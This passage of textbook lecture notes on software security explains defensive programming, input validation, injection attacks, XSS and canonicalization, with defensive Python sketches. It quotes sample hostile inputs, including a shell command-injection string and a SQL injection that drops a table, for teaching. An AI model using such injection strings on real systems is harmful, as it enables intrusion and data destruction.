
Computer Security:

Principles and Practice

Fourth Edition

By: William Stallings and Lawrie Brown

Lecture slides prepared for “Computer Security: Principles and Practice”, 4/e, by William Stallings and Lawrie Brown, Chapter 11 “Software Security”.

1

Chapter 11

Software Security

In Chapter 10 we describe the problem of buffer overflows, which continue to be one of the most common and widely exploited software vulnerabilities. Although we discuss a number of countermeasures, the best defense against this threat is not to allow it to occur at all. That is, programs need to be written securely to prevent such vulnerabilities from occurring.

More generally, buffer overflows are just one of a range of deficiencies found in poorly written programs. There are many vulnerabilities related to program deficiencies that result in the subversion of security mechanisms and allow unauthorized access and use of computer data and resources.

This chapter explores the general topic of software security. We introduce a simple model of a computer program that helps identify where security concerns may occur. We then explore the key issue of how to correctly handle program input to prevent many types of vulnerabilities and, more generally, how to write safe program code and manage the interactions with other programs and the operating system.

2

Table 11.1

CWE/SANS TOP 25 Most Dangerous Software Errors (2011)

(Table is on page 359 in the textbook)

Many computer security vulnerabilities result from poor programming practices, which the Veracode State of Software Security Report [VERA16] notes are far more prevalent than most people think. The CWE/SANS Top 25 Most Dangerous Software Errors list, summarized in Table 11.1, details the consensus view on the poor programming practices that are the cause of the majority of cyber attacks. These errors are grouped into three categories: insecure interaction between components, risky resource management, and porous defenses.

3

Security Flaws

These flaws occur as a consequence of insufficient checking and validation of data and error codes in programs

Awareness of these issues is a critical initial step in writing more secure program code

Emphasis should be placed on the need for software developers to address these known areas of concern

Critical Web application security flaws include five related to insecure software code

Unvalidated input

Cross-site scripting

Buffer overflow

Injection flaws

Improper error handling

Similarly, the Open Web Application Security Project Top Ten [OWAS13] list of critical Web application security flaws includes five related to insecure software code. These include unvalidated input, cross-site scripting, buffer overflow, injection flaws, and improper error handling. These flaws occur as a consequence of insufficient checking and validation of data and error codes in programs. We will discuss most of these flaws in this chapter. Awareness of these issues is a critical initial step in writing more secure program code. Both these sources emphasize the need for software developers to address these known areas of concern, and provide guidance on how this is done.

4

Reducing Software Vulnerabilities

The NIST report NISTIR 8151 presents a range of approaches to reduce the number of software vulnerabilities

It recommends:

Stopping vulnerabilities before they occur by using improved methods for specifying and building software

Finding vulnerabilities before they can be exploited by using better and more efficient testing techniques

Reducing the impact of vulnerabilities by building more resilient architectures

The NIST report NISTIR 8151 (Dramatically Reducing Software Vulnerabilities, October 2016) presents a range of approaches with the aim of dramatically reducing the number of software vulnerabilities. It recommends the following:

•  Stopping vulnerabilities before they occur by using improved methods for specifying and building software.

•  Finding vulnerabilities before they can be exploited by using better and more efficient testing techniques.

•  Reducing the impact of vulnerabilities by building more resilient architectures.

5

Software Security, Quality and Reliability

Software quality and reliability:

Concerned with the accidental failure of a program as a result of some theoretically random, unanticipated input, system interaction, or use of incorrect code

Improve using structured design and testing to identify and eliminate as many bugs as possible from a program

Concern is not how many bugs, but how often they are triggered

Software security:

Attacker chooses probability distribution, specifically targeting bugs that result in a failure that can be exploited by the attacker

Triggered by inputs that differ dramatically from what is usually expected

Unlikely to be identified by common testing approaches

6

Software security is closely related to software quality and reliability, but with subtle differences. Software quality and reliability is concerned with the accidental failure of a program as a result of some theoretically random, unanticipated input, system interaction, or use of incorrect code. These failures are expected to follow some form of probability distribution. The usual approach to improve software quality is to use some form of structured design and testing to identify and eliminate as many bugs as is reasonably possible from a program. The testing usually involves variations of likely inputs and common errors, with the intent of minimizing the number of bugs that would be seen in general use. The concern is not the total number of bugs in a program, but how often they are triggered, resulting in program failure.

Software security differs in that the attacker chooses the probability distribution, targeting specific bugs that result in a failure that can be exploited by the attacker. These bugs may often be triggered by inputs that differ dramatically from what is usually expected and hence are unlikely to be identified by common testing approaches.

Defensive Programming

Designing and implementing software so that it continues to function even when under attack

Requires attention to all aspects of program execution, environment, and type of data it processes

Software is able to detect erroneous conditions resulting from some attack

Also referred to as secure programming

Key rule is to never assume anything, check all assumptions and handle any possible error states

7

Writing secure, safe code requires attention to all aspects of how a program executes, the environment it executes in, and the type of data it processes. Nothing can be assumed, and all potential errors must be checked. These issues are highlighted in the following definition:

Defensive or Secure Programming is the process of designing and implementing software so that it continues to function even when under attack. Software written using this process is able to detect erroneous conditions resulting from some attack, and to either continue executing safely, or to fail gracefully. The key rule in defensive programming is to never assume anything, but to check all assumptions and to handle any possible error states.

8

This definition emphasizes the need to make explicit any assumptions about how a program will run, and the types of input it will process. To help clarify the issues, consider the abstract model of a program shown in Figure 11.1. This illustrates the concepts taught in most introductory programming courses. A program reads input data from a variety of possible sources, processes that data according to some algorithm, and then generates output, possibly to multiple different destinations. It executes in the environment provided by some operating system, using the machine instructions of some specific processor type. While processing the data, the program will use system calls, and possibly other programs available on the system. These may result in data being saved or modified on the system or cause some other side effect as a result of the program execution. All of these aspects can interact with each other, often in complex ways.

Defensive Programming

Programmers often make assumptions about the type of inputs a program will receive and the environment it executes in

Assumptions need to be validated by the program and all potential failures handled gracefully and safely

Requires a changed mindset to traditional programming practices

Programmers have to understand how failures can occur and the steps needed to reduce the chance of them occurring in their programs

Conflicts with business pressures to keep development times as short as possible to maximize market advantage

When writing a program, programmers typically focus on what is needed to solve whatever problem the program addresses. Hence their attention is on the steps needed for success and the normal flow of execution of the program rather than considering every potential point of failure. They often make assumptions about the type of inputs a program will receive and the environment it executes in. Defensive programming means these assumptions need to be validated by the program and all potential failures handled gracefully and safely. Correctly anticipating, checking, and handling all possible errors will certainly increase the amount of code needed in, and the time taken to write, a program. This conflicts with business pressures to keep development times as short as possible to maximize market advantage. Unless software security is a design goal, addressed from the start of program development, a secure program is unlikely to result.

Further, when changes are required to a program, the programmer often focuses on the changes required and what needs to be achieved. Again, defensive programming means that the programmer must carefully check any assumptions made, check and handle all possible errors, and carefully check any interactions with existing code. Failure to identify and manage such interactions can result in incorrect program behavior and the introduction of vulnerabilities into a previously secure program.

Defensive programming thus requires a changed mindset to traditional programming practices, with their emphasis on programs that solve the desired problem for most users, most of the time. This changed mindset means the programmer needs an awareness of the consequences of failure and the techniques used by attackers. Paranoia is a virtue, because the enormous growth in vulnerability reports really does show that attackers are out to get you! This mindset has to recognize that normal testing techniques will not identify many of the vulnerabilities that may exist but that are triggered by highly unusual and unexpected inputs. It means that lessons must be learned from previous failures, ensuring that new programs will not suffer the same weaknesses. It means that programs should be engineered, as far as possible, to be as resilient as possible in the face of any error or unexpected condition. Defensive programmers have to understand how failures can occur and the steps needed to reduce the chance of them occurring in their programs.

9

Security by Design

Security and reliability are common design goals in most engineering disciplines

Software development not as mature

Recent years have seen increasing efforts to improve secure software development processes

Software Assurance Forum for Excellence in Code (SAFECode)

Develop publications outlining industry best practices for software assurance and providing practical advice for implementing proven methods for secure software development

10

The necessity for security and reliability to be design goals from the inception of a project has long been recognized by most engineering disciplines. Society in general is intolerant of bridges collapsing, buildings falling down, or airplanes crashing. The design of such items is expected to provide a high likelihood that these catastrophic events will not occur. Software development has not yet reached this level of maturity, and society tolerates far higher levels of failure in software than it does in other engineering disciplines. This is despite the best efforts of software engineers and the development of a number of software development and quality standards such as ISO 12207 (Information technology - Software life cycle processes, 1997) or [SEI06]. While the focus of these standards is on the general software development life cycle, they increasingly identify security as a key design goal. Recent years have seen increasing efforts to improve secure software development processes. The Software Assurance Forum for Excellence in Code (SAFECode), with a number of major IT industry companies as members, develops publications outlining industry best practices for software assurance and providing practical advice for implementing proven methods for secure software development, including [SIMP11]. We discuss many of their recommended software security practices in this chapter.

However, the broader topic of software development techniques and standards, and the integration of security with them, is well beyond the scope of this text. [MCGR06] and [VIEG01] provide much greater detail on these topics. [SIMP11] recommends incorporating threat modeling, also known as risk analysis, as part of the design process. We discuss this area more generally in Chapter 14. Here we explore some specific software security issues that should be incorporated into a wider development methodology. We examine the software security concerns of the various interactions with an executing program, as illustrated in Figure 11.1. We start with the critical issue of safe input handling, followed by security concerns related to algorithm implementation, interaction with other components, and program output. When looking at these potential areas of concern, it is worth acknowledging that many security vulnerabilities result from a small set of common mistakes. We discuss a number of these.

The examples in this chapter focus primarily on problems seen in Web application security. The rapid development of such applications, often by developers with insufficient awareness of security concerns, and their accessibility via the Internet to a potentially large pool of attackers mean these applications are particularly vulnerable. However, we emphasize that the principles discussed apply to all programs. Safe programming practices should always be followed, even for seemingly innocuous programs, because it is very difficult to predict the future uses of programs. It is always possible that a simple utility, designed for local use, may later be incorporated into a larger application, perhaps Web enabled, with significantly different security concerns.

Handling Program Input

11

Incorrect handling of program input is one of the most common failings in software security. Program input refers to any source of data that originates outside the program and whose value is not explicitly known by the programmer when the code was written. This obviously includes data read into the program from user keyboard or mouse entry, files, or network connections. However, it also includes data supplied to the program in the execution environment, the values of any configuration or other data read from files by the program, and values supplied by the operating system to the program. All sources of input data, and any assumptions about the size and type of values they take, have to be identified. Those assumptions must be explicitly verified by the program code, and the values must be used in a manner consistent with these assumptions. The two key areas of concern for any input are the size of the input and the meaning and interpretation of the input.

Incorrect handling is a very common failing

Input is any source of data originating outside the program whose value is not explicitly known by the programmer when the code was written

Must identify all data sources

Explicitly validate assumptions on size and type of values before use

Input Size & Buffer Overflow

Programmers often make assumptions about the maximum expected size of input

Allocated buffer size is not confirmed

Resulting in buffer overflow

Testing may not identify vulnerability

Test inputs are unlikely to include large enough inputs to trigger the overflow

Safe coding treats all input as dangerous

12

When reading or copying input from some source, programmers often make assumptions about the maximum expected size of input. If the input is text entered by the user, either as a command-line argument to the program or in response to a prompt for input, the assumption is often that this input would not exceed a few lines in size. Consequently, the programmer allocates a buffer of typically 512 or 1024 bytes to hold this input but often does not check to confirm that the input is indeed no more than this size. If it does exceed the size of the buffer, then a buffer overflow occurs, which can potentially compromise the execution of the program. We discuss the problems of buffer overflows in detail in Chapter 10. Testing of such programs may well not identify the buffer overflow vulnerability, as the test inputs provided would usually reflect the range of inputs the programmers expect users to provide. These test inputs are unlikely to include sufficiently large inputs to trigger the overflow, unless this vulnerability is being explicitly tested.

A number of widely used standard C library routines, some listed in Table 10.2, compound this problem by not providing any means of limiting the amount of data transferred to the space available in the buffer. We discuss a range of safe programming practices related to preventing buffer overflows in Section 10.2. These include the use of safe string and buffer copying routines, and an awareness of these software security traps by programmers.

Writing code that is safe against buffer overflows requires a mindset that regards any input as dangerous and processes it in a manner that does not expose the program to danger. With respect to the size of input, this means either using a dynamically sized buffer to ensure that sufficient space is available or processing the input in buffer-sized blocks. Even if dynamically sized buffers are used, care is needed to ensure that the space requested does not exceed available memory. Should this occur, the program must handle this error gracefully. This may involve processing the input in blocks, discarding excess input, terminating the program, or any other action that is reasonable in response to such an abnormal situation. These checks must apply wherever data whose value is unknown enter, or are manipulated by, the program. They must also apply to all potential sources of input.
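The following is a minimal sketch in Python of the two size-handling strategies just described (the chapter's own examples use C, perl, and PHP). The limit and block-size constants and the handle routine are illustrative assumptions, not values from the text.

import io

MAX_INPUT = 1024   # assumed upper bound on accepted input (illustrative)
BLOCK_SIZE = 512   # fixed block size for incremental processing (illustrative)

def read_bounded(stream, limit=MAX_INPUT):
    # Read at most `limit` bytes; reject oversized input gracefully
    # instead of silently truncating or overrunning a fixed buffer.
    data = stream.read(limit + 1)
    if len(data) > limit:
        raise ValueError("input exceeds %d bytes" % limit)
    return data

def process_in_blocks(stream, handle=print):
    # Alternative strategy: never hold more than BLOCK_SIZE bytes at once.
    while True:
        block = stream.read(BLOCK_SIZE)
        if not block:
            break
        handle(block)   # per-block processing; print is a stand-in here

# Usage sketch: a 1200-byte input is handled as three bounded blocks.
process_in_blocks(io.BytesIO(b"x" * 1200))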

Interpretation of Program Input

Program input may be binary or text

Binary interpretation depends on encoding and is usually application specific

There is an increasing variety of character sets being used

Care is needed to identify just which set is being used and what characters are being read

Failure to validate may result in an exploitable vulnerability

2014 Heartbleed OpenSSL bug is a recent example of a failure to check the validity of a binary input value

13

The other key concern with program input is its meaning and interpretation. Program input data may be broadly classified as textual or binary. When processing binary data, the program assumes some interpretation of the raw binary values as representing integers, floating-point numbers, character strings, or some more complex structured data representation. The assumed interpretation must be validated as the binary values are read. The details of how this is done will depend very much on the particular interpretation and encoding of the information. As an example, consider the complex binary structures used by network protocols in Ethernet frames, IP packets, and TCP segments, which the networking code must carefully construct and validate. At a higher layer, DNS, SNMP, NFS, and other protocols use binary encoding of the requests and responses exchanged between parties using these protocols. These are often specified using some abstract syntax language, and any specified values must be validated against this specification.

The 2014 Heartbleed OpenSSL bug, which we discuss further in Section 22.3, is a recent example of a failure to check the validity of a binary input value. Because of a coding error, failing to check the amount of data requested for return against the amount supplied, an attacker could access the contents of adjacent memory. This memory could contain information such as user names and passwords, private keys, and other sensitive information. This bug potentially compromised a very large number of servers and their users. It is an example of a buffer over-read.
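The missing check is easy to state in code. Here is a sketch in Python of validating a declared length field in a binary record before use, in the spirit of the Heartbleed flaw; the two-byte-length-plus-payload record layout is a hypothetical example, not the actual TLS heartbeat format.

import struct

def parse_record(data: bytes) -> bytes:
    # Assumed layout: 2-byte big-endian length field, then payload.
    if len(data) < 2:
        raise ValueError("record too short to contain a length field")
    (declared_len,) = struct.unpack("!H", data[:2])
    payload = data[2:]
    # The check Heartbleed-style bugs omit: compare the declared length
    # against the data actually supplied before using it.
    if declared_len > len(payload):
        raise ValueError("declared length exceeds supplied payload")
    return payload[:declared_len]

print(parse_record(b"\x00\x03abc"))   # b'abc'
# parse_record(b"\x40\x00abc") raises instead of over-reading memory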

More commonly, programs process textual data as input. The raw binary values are interpreted as representing characters, according to some character set. Traditionally, the ASCII character set was assumed, although common systems like Windows and Mac OS X both use different extensions to manage accented characters. With increasing internationalization of programs, there is an increasing variety of character sets being used. Care is needed to identify just which set is being used, and hence just what characters are being read.

Beyond identifying which characters are input, their meaning must be identified. They may represent an integer or floating-point number. They might be a filename, a URL, an e-mail address, or an identifier of some form. Depending on how these inputs are used, it may be necessary to confirm that the values entered do indeed represent the expected type of data. Failure to do so could result in a vulnerability that permits an attacker to influence the operation of the program, with possibly serious consequences.

To illustrate the problems with interpretation of textual input data, we first discuss the general class of injection attacks that exploit failure to validate the interpretation of input. We then review mechanisms for validating input data and the handling of internationalized inputs using a variety of character sets.

Injection Attacks

Flaws relating to invalid handling of input data, specifically when program input data can accidentally or deliberately influence the flow of execution of the program

14

The term injection attack refers to a wide variety of program flaws related to invalid handling of input data. Specifically, this problem occurs when program input data can accidentally or deliberately influence the flow of execution of the program. There are a wide variety of mechanisms by which this can occur. One of the most common is when input data are passed as a parameter to another helper program on the system, whose output is then processed and used by the original program. This most often occurs when programs are developed using scripting languages such as perl, PHP, python, sh, and many others. Such languages encourage the reuse of other existing programs and system utilities where possible to save coding effort. They may be used to develop applications on some system. More commonly, they are now often used as Web CGI scripts to process data supplied from HTML forms.

Most often occur in scripting languages

Encourage reuse of other programs and system utilities where possible to save coding effort

Often used as Web CGI scripts

15

Consider the example perl CGI script shown in Figure 11.2a, which is designed to return some basic details on the specified user using the UNIX finger command. This script would be placed in a suitable location on the Web server and invoked in response to a simple form, such as that shown in Figure 11.2b. The script retrieves the desired information by running a program on the server system, and returning the output of that program, suitably reformatted if necessary, in a HTML Web page. This type of simple form and associated handler were widely seen and were often presented as simple examples of how to write and use CGI scripts. Unfortunately, this script contains a critical vulnerability. The value of the user is passed directly to the finger program as a parameter. If the identifier of a legitimate user is supplied, for example, lpb, then the output will be the information on that user, as shown first in Figure 11.2c. However, if an attacker provides a value that includes shell meta-characters, for example, xxx; echo attack success; ls -1 finger*, then the result is as shown second in Figure 11.2c. The attacker is able to run any program on the system with the privileges of the Web server. In this example the extra commands were just to display a message and list some files in the Web directory. But any command could be used.

This is known as a command injection attack, because the input is used in the construction of a command that is subsequently executed by the system with the privileges of the Web server. It illustrates the problem caused by insufficient checking of program input. The main concern of this script’s designer was to provide Web access to an existing system utility. The expectation was that the input supplied would be the login or name of some user, as it is when a user on the system runs the finger program. Such a user could clearly supply the values used in the command injection attack, but the result is to run the programs with their existing privileges. It is only when the Web interface is provided, where the program is now run with the privileges of the Web server but with parameters supplied by an unknown external user, that the security concerns arise.

To counter this attack, a defensive programmer needs to explicitly identify any assumptions as to the form of input and to verify that any input data conform to those assumptions before any use of the data. This is usually done by comparing the input data to a pattern that describes the data’s assumed form and rejecting any input that fails this test. We discuss the use of pattern matching in the subsection on input validation later in this section. A suitable extension of the vulnerable finger CGI script is shown in Figure 11.2d. This adds a test that ensures that the user input contains just alphanumeric characters. If not, the script terminates with an error message specifying that the supplied input contained illegal characters. Note that while this example uses perl, the same type of error can occur in a CGI program written in any language. While the solution details differ, they all involve checking that the input matches assumptions about its form.
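The same defense translates directly to other languages. Below is a sketch in Python of the Figure 11.2d check (the original figure uses perl); the function name is illustrative, and the alphanumeric allow-list pattern is the one described in the text.

import re
import subprocess

def safe_finger(user: str) -> str:
    # Accept only alphanumeric usernames, mirroring Figure 11.2d's test;
    # anything else is rejected before the command is built.
    if not re.fullmatch(r"[A-Za-z0-9]+", user):
        raise ValueError("finger argument contains illegal characters")
    # Passing an argument list (no shell) means shell metacharacters are
    # never interpreted, even if the check above were somehow bypassed.
    result = subprocess.run(["finger", user], capture_output=True, text=True)
    return result.stdout

# safe_finger("lpb") runs normally;
# safe_finger("xxx; echo attack success") raises ValueError.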

16

Another widely exploited variant of this attack is SQL injection, which we introduced and described in Section 5.4. In this attack, the user-supplied input is used to construct a SQL request to retrieve information from a database. Consider the excerpt of PHP code from a CGI script shown in Figure 11.3a. It takes a name provided as input to the script, typically from a form field similar to that shown in Figure 11.2b. It uses this value to construct a request to retrieve the records relating to that name from the database. The vulnerability in this code is very similar to that in the command injection example. The difference is that SQL metacharacters are used, rather than shell metacharacters. If a suitable name is provided, for example, Bob, then the code works as intended, retrieving the desired record. However, an input such as Bob'; drop table suppliers results in the specified record being retrieved, followed by deletion of the entire table! This would have rather unfortunate consequences for subsequent users. To prevent this type of attack, the input must be validated before use. Any metacharacters must either be escaped, canceling their effect, or the input rejected entirely. Given the widespread recognition of SQL injection attacks, many languages used by CGI scripts contain functions that can sanitize any input that is subsequently included in a SQL request. The code shown in Figure 11.3b illustrates the use of a suitable PHP function to correct this vulnerability. Alternatively, rather than constructing SQL statements directly by concatenating values, recent advisories recommend the use of SQL placeholders or parameters to securely build SQL statements. Combined with the use of stored procedures, this can result in more robust and secure code.
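Here is a sketch of the placeholder approach using Python's built-in sqlite3 module (the textbook's Figure 11.3 uses PHP); the table and column names are hypothetical.

import sqlite3

def find_supplier(conn: sqlite3.Connection, name: str):
    # The "?" placeholder transmits `name` to the database as data, never
    # as SQL text, so an input like "Bob'; drop table suppliers" cannot
    # alter the statement itself.
    cur = conn.execute("SELECT * FROM suppliers WHERE name = ?", (name,))
    return cur.fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE suppliers (name TEXT, city TEXT)")
conn.execute("INSERT INTO suppliers VALUES ('Bob', 'Perth')")
print(find_supplier(conn, "Bob"))                         # [('Bob', 'Perth')]
print(find_supplier(conn, "Bob'; drop table suppliers"))  # [] -- no injection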

17

A third common variant is the code injection attack, where the input includes code that is then executed by the attacked system. Many of the buffer overflow examples we discuss in Chapter 10 include a code injection component. In those cases, the injected code is binary machine language for a specific computer system. However, there are also significant concerns about the injection of scripting language code into remotely executed scripts. Figure 11.4a illustrates a few lines from the start of a vulnerable PHP calendar script. The flaw results from the use of a variable to construct the name of a file that is then included into the script. Note that this script was not intended to be called directly. Rather, it is a component of a larger, multifile program. The main script sets the value of the $path variable to refer to the main directory containing the program and all its code and data files. Using this variable elsewhere in the program meant that customizing and installing the program required changes to just a few lines. Unfortunately, attackers do not play by the rules. Just because a script is not supposed to be called directly does not mean it is not possible. The access protections must be configured in the Web server to block direct access to prevent this. Otherwise, if direct access to such scripts is combined with two other features of PHP, a serious attack is possible. The first is that PHP originally assigned the value of any input variable supplied in the HTTP request to global variables with the same name as the field. This made the task of writing a form handler easier for inexperienced programmers. Unfortunately, there was no way for the script to limit just which fields it expected. Hence a user could specify values for any desired global variable and they would be created and passed to the script. In this example, the variable $path is not expected to be a form field. The second PHP feature concerns the behavior of the include command. Not only could local files be included, but if a URL is supplied, the included code can be sourced from anywhere on the network. Combine all of these elements, and the attack may be implemented using a request similar to that shown in Figure 11.4b. This results in the $path variable containing the URL of a file containing the attacker’s PHP code. It also defines another variable, $cmd, which tells the attacker’s script what command to run. In this example, the extra command simply lists files in the current directory. However, it could be any command the Web server has the privilege to run. This specific type of attack is known as a PHP remote code injection or PHP file inclusion vulnerability. Research shows that a significant number of PHP CGI scripts are vulnerable to this type of attack and are being actively exploited.

There are several defenses available to prevent this type of attack. The most obvious is to block assignment of form field values to global variables. Rather, they are saved in an array and must be explicitly retrieved by name. This behavior is illustrated by the code in Figure 11.3. It is the default for all newer PHP installations. The disadvantage of this approach is that it breaks any code written using the older assumed behavior. Correcting such code may take a considerable amount of effort. Nonetheless, except in carefully controlled cases, this is the preferred option. It not only prevents this specific type of attack, but a wide variety of other attacks involving manipulation of global variable values. Another defense is to only use constant values in include (and require) commands. This ensures that the included code does indeed originate from the specified files. If a variable has to be used, then great care must be taken to validate its value immediately before it is used.
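The "constant values only" defense can be approximated in any language by comparing a requested name against a fixed allow-list before loading it. The following is a sketch in Python; the template names and directory are hypothetical.

from pathlib import Path

ALLOWED_INCLUDES = {"calendar.html", "header.html", "footer.html"}
BASE_DIR = Path("/var/www/app/templates")

def load_template(name: str) -> str:
    # Compare against a fixed allow-list rather than trusting request
    # data, so a URL or "../" path supplied by an attacker is rejected
    # outright instead of being fetched and executed.
    if name not in ALLOWED_INCLUDES:
        raise ValueError("unknown template requested")
    return (BASE_DIR / name).read_text()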

There are other injection attack variants, including mail injection, format string injection, and interpreter injection. New injection attack variants continue to be found. They can occur whenever one program invokes the services of another program, service, or function and passes to it externally sourced, potentially untrusted information without sufficient inspection and validation of it. This just emphasizes the need to identify all sources of input, to validate any assumptions about such input before use, and to understand the meaning and interpretation of values supplied to any invoked program, service, or function.

Cross Site Scripting (XSS) Attacks

18

Another broad class of vulnerabilities concerns input provided to a program by one user that is subsequently output to another user. Such attacks are known as cross-site scripting (XSS) attacks because they are most commonly seen in scripted Web applications. This vulnerability involves the inclusion of script code in the HTML content of a Web page displayed by a user’s browser. The script code could be JavaScript, ActiveX, VBScript, Flash, or just about any client-side scripting language supported by a user’s browser. To support some categories of Web applications, script code may need to access data associated with other pages currently displayed by the user’s browser. Because this clearly raises security concerns, browsers impose security checks and restrict such data access to pages originating from the same site. The assumption is that all content from one site is equally trusted and hence is permitted to interact with other content from that site.

Cross-site scripting attacks exploit this assumption and attempt to bypass the browser’s security checks to gain elevated access privileges to sensitive data belonging to another site. These data can include page contents, session cookies, and a variety of other objects. Attackers use a variety of mechanisms to inject malicious script content into pages returned to users by the targeted sites. The most common variant is the XSS reflection vulnerability. The attacker includes the malicious script content in data supplied to a site. If this content is subsequently displayed to other users without sufficient checking, they will execute the script assuming it is trusted to access any data associated with that site. Consider the widespread use of guestbook programs, wikis, and blogs by many Web sites. They all allow users accessing the site to leave comments, which are subsequently viewed by other users. Unless the contents of these comments are checked and any dangerous code removed, the attack is possible.

Attacks where input provided by one user is subsequently output to another user

Commonly seen in scripted Web applications

Vulnerability involves the inclusion of script code in the HTML content

Script code may need to access data associated with other pages

Browsers impose security checks and restrict data access to pages originating from the same site

Exploit assumption that all content from one site is equally trusted and hence is permitted to interact with other content from the site

XSS reflection vulnerability

Attacker includes the malicious script content in data supplied to a site

19

Consider the example shown in Figure 11.5a. If this text were saved by a guestbook application, then when viewed it displays a little text and then executes the JavaScript code. This code replaces the document contents with the information returned by the attacker’s cookie script, which is provided with the cookie associated with this document. Many sites require users to register before using features like a guestbook application. With this attack, the user’s cookie is supplied to the attacker, who could then use it to impersonate the user on the original site. This example obviously replaces the page content being viewed with whatever the attacker’s script returns. By using more sophisticated JavaScript code, it is possible for the script to execute with very little visible effect.

To prevent this attack, any user-supplied input should be examined and any dangerous code removed or escaped to block its execution. While the example shown may seem easy to check and correct, the attacker will not necessarily make the task this easy. The same code is shown in Figure 11.5b, but this time all of the characters relating to the script code are encoded using HTML character entities. While the browser interprets this identically to the code in Figure 11.5a, any validation code must first translate such entities to the characters they represent before checking for potential attack code. We discuss this further in the next section.
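A sketch in Python of handling the Figure 11.5 case: decode any HTML character entities first, so checks see the real characters, then escape on output. The function name is illustrative; html.unescape and html.escape are standard-library routines.

import html

def render_comment(raw: str) -> str:
    # First canonicalize: decode entities such as &#60; back to "<" so
    # any filtering sees the actual characters (cf. Figure 11.5b).
    decoded = html.unescape(raw)
    # Then escape on output so any <script> content is displayed as text
    # rather than executed by the viewer's browser.
    return html.escape(decoded)

print(render_comment("Thanks! &#60;script&#62;alert(1)&#60;/script&#62;"))
# -> Thanks! &lt;script&gt;alert(1)&lt;/script&gt;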

XSS attacks illustrate a failure to correctly handle both program input and program output. The failure to check and validate the input results in potentially dangerous data values being saved by the program. However, the program is not the target. Rather it is subsequent users of the program, and the programs they use to access it, which are the target. If all potentially unsafe data output by the program are sanitized, then the attack cannot occur. We discuss correct handling of output in Section 11.5.

There are other attacks similar to XSS, including cross-site request forgery, and HTTP response splitting. Again the issue is careless use of untrusted, unchecked input.

Validating Input Syntax

20

Given that the programmer cannot control the content of input data, it is necessary to ensure that such data conform with any assumptions made about the data before subsequent use. If the data are textual, these assumptions may be that the data contain only printable characters, have certain HTML markup, are the name of a person, a userid, an e-mail address, a filename, and/or a URL. Alternatively, the data might represent an integer or other numeric value. A program using such input should confirm that it meets these assumptions. An important principle is that input data should be compared against what is wanted, accepting only valid input. The alternative is to compare the input data with known dangerous values. The problem with this approach is that new problems and methods of bypassing existing checks continue to be discovered. By trying to block known dangerous input data, an attacker using a new encoding may succeed. By only accepting known safe data, the program is more likely to remain secure.

This type of comparison is commonly done using regular expressions. It may be explicitly coded by the programmer or may be implicitly included in a supplied input processing routine. Figures 11.2d and 11.3b show examples of these two approaches. A regular expression is a pattern composed of a sequence of characters that describe allowable input variants. Some characters in a regular expression are treated literally, and the input compared to them must contain those characters at that point. Other characters have special meanings, allowing the specification of alternative sets of characters, classes of characters, and repeated characters. Details of regular expression content and usage vary from language to language. An appropriate reference should be consulted for the language in use.

If the input data fail the comparison, they could be rejected. In this case a suitable error message should be sent to the source of the input to allow it to be corrected and reentered. Alternatively, the data may be altered to conform. This generally involves escaping metacharacters to remove any special interpretation, thus rendering the input safe.
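A sketch in Python of allow-list validation with regular expressions; the patterns shown are illustrative examples of "accept only what is wanted," not a complete specification of each data type.

import re

PATTERNS = {
    "userid":   re.compile(r"[a-z][a-z0-9_]{0,15}\Z"),
    "integer":  re.compile(r"[+-]?\d+\Z"),
    # Word characters, ".", "-" only; no "/" and no leading ".", so
    # neither absolute paths nor ".." parent references can match.
    "filename": re.compile(r"\w[\w.-]*\Z"),
}

def validate(kind: str, value: str) -> str:
    # Accept only input matching the expected form; reject everything else.
    if not PATTERNS[kind].match(value):
        raise ValueError(f"invalid {kind}: {value!r}")
    return value

print(validate("userid", "lpb"))           # accepted
# validate("userid", "xxx; echo attack")   raises ValueError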

It is necessary to ensure that data conform with any assumptions made about the data before subsequent use

Input data should be compared against what is wanted

Alternative is to compare the input data with known dangerous values

By only accepting known safe data the program is more likely to remain secure

Alternate Encodings

21

Figure 11.5 illustrates a further issue of multiple, alternative encodings of the input data. This could occur because the data are encoded in HTML or some other structured encoding that allows multiple representations of characters. It can also occur because some character set encodings include multiple encodings of the same character. This is particularly obvious with the use of Unicode and its UTF-8 encoding.

Traditionally, computer programmers assumed the use of a single, common character set, which in many cases was ASCII. This 7-bit character set includes all the common English letters, numbers, and punctuation characters. It also includes a number of common control characters used in computer and data communications applications. However, it is unable to represent the additional accented characters used in many European languages nor the much larger number of characters used in languages such as Chinese and Japanese. There is a growing requirement to support users around the globe and to interact with them using their own languages. The Unicode character set is now widely used for this purpose. It is the native character set used in the Java language, for example. It is also the native character set used by operating systems such as Windows XP and later. Unicode uses a 16-bit value to represent each character. This provides sufficient characters to represent most of those used by the world’s languages. However, many programs, databases, and other computer and communications applications assume an 8-bit character representation, with the first 128 values corresponding to ASCII. To accommodate this, a Unicode character can be encoded as a 1- to 4-byte sequence using the UTF-8 encoding. Any specific character is supposed to have a unique encoding. However, if the strict limits in the specification are ignored, common ASCII characters may have multiple encodings. For example, the forward slash character “/”, used to separate directories in a UNIX filename, has the hexadecimal value “2F” in both ASCII and UTF-8. UTF-8 also allows the redundant, longer encodings: “C0 AF” and “E0 80 AF”. While strictly only the shortest encoding should be used, many Unicode decoders accept any valid equivalent sequence.

Consider the consequences of multiple encodings when validating input. There is a class of attacks that attempt to supply an absolute pathname for a file to a script that expects only a simple local filename. The common check to prevent this is to ensure that the supplied filename does not start with “/” and does not contain any “../” parent directory references. If this check only assumes the correct, shortest UTF-8 encoding of slash, then an attacker using one of the longer encodings could avoid this check. This precise attack and flaw was used against a number of versions of Microsoft’s IIS Web server in the late 1990s. A related issue occurs when the application treats a number of characters as equivalent. For example, a case insensitive application that also ignores letter accents could have 30 equivalent representations of the letter A. These examples demonstrate the problems both with multiple encodings, and with checking for dangerous data values rather than accepting known safe values. In this example, a comparison against a safe specification of a filename would have rejected some names with alternate encodings that were actually acceptable. However, it would definitely have rejected the dangerous input values.

Given the possibility of multiple encodings, the input data must first be transformed into a single, standard, minimal representation. This process is called canonicalization and involves replacing alternate, equivalent encodings by one common value. Once this is done, the input data can then be compared with a single representation of acceptable input values. There may potentially be a large number of input and output fields that require checking. [SIMP11] and others recommend the use of anti-XSS libraries, or web UI frameworks with integrated XSS protection, that automate much of the checking process, rather than writing explicit checks for each field.
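A sketch in Python of canonicalizing before checking, for the local-filename case discussed above. Note that Python's UTF-8 decoder already rejects overlong byte sequences such as "C0 AF"; this sketch addresses the remaining Unicode-equivalence layer, and the function names are illustrative.

import unicodedata

def canonical(text: str) -> str:
    # Replace equivalent Unicode sequences (e.g., composed vs. decomposed
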